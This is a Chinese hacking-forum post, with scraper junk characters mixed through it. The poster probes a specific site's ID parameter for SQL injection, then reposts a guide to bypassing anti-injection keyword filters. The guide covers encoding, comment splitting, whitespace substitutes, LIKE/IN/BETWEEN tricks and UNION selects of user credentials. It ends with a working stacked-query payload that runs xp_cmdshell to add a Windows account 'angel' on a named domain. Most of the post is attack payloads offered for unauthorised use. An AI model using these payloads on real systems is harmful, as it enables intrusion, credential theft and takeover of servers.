路过这个网站,检测了一下.; A. M- N! J+ e) S' Q4 u7 X2 r- |
http://www.xxx.cn/Article.asp?ID=117 and 1=1
b4 H. w* ]8 B; |1 p5 N直接返回主页
+ {3 ]' u2 V% Y9 yhttp://www.xxx.cn/Article.asp?ID=117 or 1=1
& `6 |$ ~8 y: d- C& J" b直接返回主页
6 J; w: p: a( R" J) N/ yhttp://www.xxx.cn/Article.asp?ID=117 or6 j( F! r S0 I4 d d" ^3 h
没有返回主页 没有过滤or" h' C% N) _) O9 o* `4 ]
http://www.xxx.cn/Article.asp?ID=117 and
6 d7 ?$ [ H, Y- y- d) O% ^ R* ?直接返回主页 看来过滤了and" U M2 T6 r% @% `5 |- A% q
http://www.xxx.cn/Article.asp?ID=117 or 1
4 E3 ]4 _9 s7 d. w0 x* f+ E1 c* u9 R没有返回主页 即没有过滤or 也没有过滤1( y& q% e' p! s4 h {
http://www.xxx.cn/Article.asp?ID=117 or 1=1
3 \2 U& v$ _) B. C; P$ a: `2 j直接返回主页 很明显过滤了等号
' L; w8 R6 X+ n+ q4 ^& wor的特性是与and相反的.! J+ j1 B7 ]: ]5 C; P
or 1=1 爆错 或与原页面不同6 e) f+ R$ P! c/ v) ~' A
or 1=2 原页面相同7 M. k( t+ k$ s! X: H( |
这样就是一个注入点! z' Y4 X" ?' X+ E, s
但他过滤了=号 我就用><号代替=号吧!
+ e: |' e* X0 Z8 por 1<2 很明显是正确的,所以应该与原页面不同) ^- t' l& H4 S
or 1>2 很明显是错误的,所以应该与原页面相同8 `. C& v+ h+ x/ N9 S9 M
然后看看有没有过滤其他的查询语句,比如select.% F8 `( z* B; P Z) j8 L
http://www.xxx.cn/Article.asp?ID=117 select
8 a N* p0 ?6 j; z直接返回主页
1 ~; e8 g2 R9 M7 J6 I又迷茫了..- B# ]8 Z( |: D
/ t0 N1 F) z( ]" e& t- Y0 x: N6 F- L5 P
1 {$ A5 S1 Z, d( h; Y3 o3 W
cookies注入.和以下的方法全都试过了,都失败了.还有什么方法可以饶过吗; h+ Y% L" ^9 l# Z, b
这个系统我以为是my动力,后台却是这样的http://www.xxx.cn/admin.asp(应该不是假够台吧)
, M3 U- t5 V" z2 D* @================================================
" X; ~3 g" O0 k以下是转贴:
7 I8 a* ~: C. o% S2 F: Z2 H% U4 [+ |2 B) b. l# x# `5 y" \+ R: m1 p K
突然想我们是否可以用什么方法绕过SQL注入的限制呢?到网上考察了一下,提到的方法大多都是针对AND与“’”号和“=”号过滤的突破,虽然有点进步的地方,但还是有一些关键字没有绕过,由于我不常入侵网站所以也不敢对上述过滤的效果进行评论,但是可以肯定的是,效果不会很好…… & _; N0 \; i* {
经过我的收集,大部分的防注入程序都过滤了以下关键字: ! r: i5 o1 p; Q8 K2 P3 @
and | select | update | chr | delete | %20from | ; | insert | mid | master. | set | =
: r. L7 G- I1 q而这里最难处理的就是select这个关键字了,那么我们怎样来突破他们呢?问题虽未完全解决,但还是说出来与大家分享一下,希望能抛砖引玉。 0 M) e& P1 D3 F1 |
对于关键字的过滤,以下是我收集的以及我个人的一些想法。
3 R* h8 z: s I {8 `4 i& U" @1、运用编码技术绕过
: \7 }% p0 `3 ~. \ w7 j2 }如URLEncode编码,ASCII编码绕过。例如or 1=1即
7 D6 E$ T" o6 C%6f%72%20%31%3d%31,而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。 5 U, q8 c- z! s1 q7 u
9 h! `2 ^" y" R& X
2、通过空格绕过 / ^9 c- t; s G# m" _9 x$ o
如两个空格代替一个空格,用Tab代替空格等,或者删除所有空格,如
/ J; T. K( u' c/ x$ ?or’ swords’ =‘swords’ 3 L2 U3 B+ @7 R
,由于mssql的松散性,我们可以把or ’swords’ 之间的空格去掉,并不影响运行。
9 {8 a( b# I/ c7 ]8 u: {3、运用字符串判断代替
- o2 P5 N" ^# t( p6 b2 N用经典的or 1=1判断绕过,如 ! U h. [* f5 l0 V- Z! s
or ’swords’ =’swords’
s1 u! M1 s$ c8 f: C,这个方法就是网上在讨论的。
% j) ~7 K" L0 S2 d4、通过类型转换修饰符N绕过 ! @- P/ t) j, T: \8 H4 N( `8 l
可以说这是一个不错的想法,他除了能在某种程度上绕过限制,而且还有别的作用,大家自己好好想想吧。关于利用,如or ’swords’ = N’ swords’ ,大写的N告诉mssql server 字符串作为nvarchar类型,它起到类型转换的作用,并不影响注射语句本身,但是可以避过基于知识的模式匹配IDS。
( D5 M# t" f6 B0 q5、通过+号拆解字符串绕过 * K( f6 J T9 ]+ Q( T5 h0 U
效果值得考证,但毕竟是一种方法。如
* w. N4 S4 j. h f& x, Z& lor ’swords’ =‘sw’ +’ ords’ ;EXEC(‘IN’ +’ SERT INTO ’+’ …..’ ) " s2 a3 ^5 A$ ]5 ~ n1 ^
3 {4 j7 X7 Z! V, ], h) A6、通过LIKE绕过
; g' C2 h% i) g, d& z9 |0 x, T以前怎么就没想到呢?如or
& E. @9 t b: }8 x; y’swords’ LIKE ’sw’ u; m8 A6 G% u: v
!!!显然可以很轻松的绕过 : t0 I; {% ^. ?8 G1 q. c/ k6 Y
“=”“>” 0 f2 H7 j3 P! L$ q' P" r% {6 O, v
的限制……
3 ?' }1 i$ s' z: K5 C9 I7、通过IN绕过 % U) s: \( C5 g1 }" Y3 \8 T
与上面的LIKE的思路差不多,如 ; h, N) U/ z9 U) S
or ’swords’ IN (’swords’) % d0 t+ l( N- f
# `5 s$ k( `& o* w' s8、通过BETWEEN绕过 5 e% [, s( p; c
如 2 u( L0 S$ J8 p2 t$ ^
or ’swords’ BETWEEN ’rw’ AND ’tw’ 7 N M9 F6 Z1 y
& M) a$ }8 X; h( U0 v }' w; F9、通过>或者<绕过
- x. a+ t8 c* B0 b, I Cor ’swords’ > ’sw’
* ~3 G! x* A, _4 b* Uor ’swords’ < ’tw’ / @& |% [+ c& D6 d Q% @8 s
or 1<3 0 [2 w2 r+ u' I, X+ v4 C
……
! y/ b. A( |6 D0 v' D10、运用注释语句绕过 9 }7 b2 ]8 C3 ^$ T
用/**/代替空格,如: 3 s! n0 g. S* d( K3 H
UNION /**/ Select /**/user,pwd,from tbluser
$ l( C. r( \) O: W/ L; m
# P1 h% B% e: Q% _% `( D: l用/**/分割敏感词,如: ( [2 G6 L: i% E4 C* }7 I9 s" A
U/**/ NION /**/ SE/**/ LECT /**/user,pwd from tbluser
0 X. j8 K4 H% y* X6 O! k y4 G8 H) G2 E5 ?* z
11、用HEX绕过,一般的IDS都无法检测出来 ) t3 {' J$ g5 s
0x730079007300610064006D0069006E00 =hex(sysadmin) - N9 |; y8 X' Z8 W: ?1 \
0x640062005F006F0077006E0065007200 =hex(db_owner)
3 h* S' x1 m: F0 Q1 o9 P另外,关于通用点的过滤方法,我们可以考虑采用赋值的方法,例如先声明一个变量a,然后把我们的指令赋值给a,然后调用变量a最终执行我们输入的命令。变量a可以是任何命令。如下: % ^. U5 m# D5 L
declare @a sysname 6 n8 |6 p7 c5 X% W
select @a=
; ?* _' Y2 k" _ exec master.dbo.xp_cmdshell @a
6 x. C B$ s# H( K* |4 _效果
& z7 ~+ O. `6 i4 C* h& v7 L/ Nhttp://www.ilikeplmm.com/show.asp?id=1;declare%20@a% [email=20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a]20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a[/email];-- ( A% N* g- K3 j0 \" o2 N7 o
4 t! B+ ]& B( X其中的
! Y2 b. `# _, G0 f& v" p- o0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400
$ F( \, \5 @' ?8 U# G就是
# \( N6 d: @" f! D1 k0 L- L“net user angel pass /add”! \/ A5 T9 a( Z+ Z
; ]/ y9 A& A! g
一直以来都以为只有空格,tab键和注释符/**/可以用来切割sql关键字,段时间在邪八看了风迅cms注入漏洞那篇帖子,才知道原来回车也可以用来作为分割符(以前竟然没有想到,真是失败)。回车的ascii码是chr(13)&chr(10),至于为什么要两个连在一起,这个我也不知道。转换成url编码形式是%0d%0a,于是就可以用%0d%0a代替空格pass一些过滤空格的检查了。! u2 ^. D# c+ i F" C! h2 H) l
引申一下,只用%0d能正常执行语句吗?只用%0a呢?测试证明,用任意一种分割在mssql、mysql和access里面都是可以的。
2 r8 X' A& ]: }; E% j另外,关于mssql的多语句问题。我以前一直以为必须用分号作为语句的结尾,后来发现,完全不是那样。类似8 f2 [0 W0 f$ l2 R' y
Copy code
0 f* l: ~: P! A& [# Q* Fselect * from table exec xp_cmdshell'xxxxxxxxxx'
' `( _# v* g2 B! T7 `
. s; Z. B9 k F1 H2 R: t ^8 y, \' A$ w' n* f" j b
select * from table/**/exec xp_cmdshell'xxxxxxxxxx'
7 a& [0 j, W) m1 A: X1 [- e. O; ~5 L- L* R9 w8 M. u9 w
% I; Q; Z% i% V
select * from table|---tab---|exec xp_cmdshell'xxxxxxxxxx'
" C8 t$ P& b* B. D" Y: t6 a% i2 U5 d4 q6 c6 e
8 h) z! m0 r5 X' X
select * from table|---enter---|exec xp_cmdshell'xxxxxxxxxx'$ y: {# |* l' _
6 A( Z! t% y% C% @
的语句都是可以正常执行的。而我以前竟然一直不知道!不过这个貌似跟连接数据库驱动有关系,odbc可以正常执行,sqloledb的话就会报错。有兴趣的继续研究吧?
$ G( z, n- j8 Z3 n% |$ s* i3 P; k+ E) C7 e
这样,以后遇到带空格过滤关键字的拦截程序,又可以发挥发挥了9 x' k3 L- W- c F7 y/ h J
可能大家早就知道了,不管怎么说,发在这里吧!/ x! p1 M* l1 T1 L
2 b0 _0 ]. v% `! t2 L' t0 b最近想起可能还有些ascii码可以用来在sql语句中代替空格,于是写个脚本测试了一下,结果在所有128个低位ascii字符中,chr(12)也可以在access里用,不过貌似chr(12)不能出现在and、or之类的关键词附近,原因不清楚。mysql中比access多一个chr(11)可以。至于mssql,挖日,直接从1到32的ascii码换成字符后都可以正常使用。
6 p3 R+ `. ^8 a) d# |) n( e( t& I2 X; {* L* m% I' s3 D: Q b7 e
/ U5 o% X$ [" h
& I9 |) L2 x: X5 `$ _- a对于中间应该出现空格的地方,用()进行替换,不过,对于很复杂的SQL语句就不太好用了。上面说到的是字符型的,如果是数值型,可以在id=1后加一个括号,不过这个我没有测试,% g# A7 D+ s9 X5 z1 X
比如:jmdcw.asp?id=(1)and(select.....),应该是可行的吧?
4 F$ q0 o- R- Y" S3 Y$ C
5 b. k0 L. i+ r9 J. F! _ |
发表于 2012-9-15 14:47:46
收藏
分享
支持
反对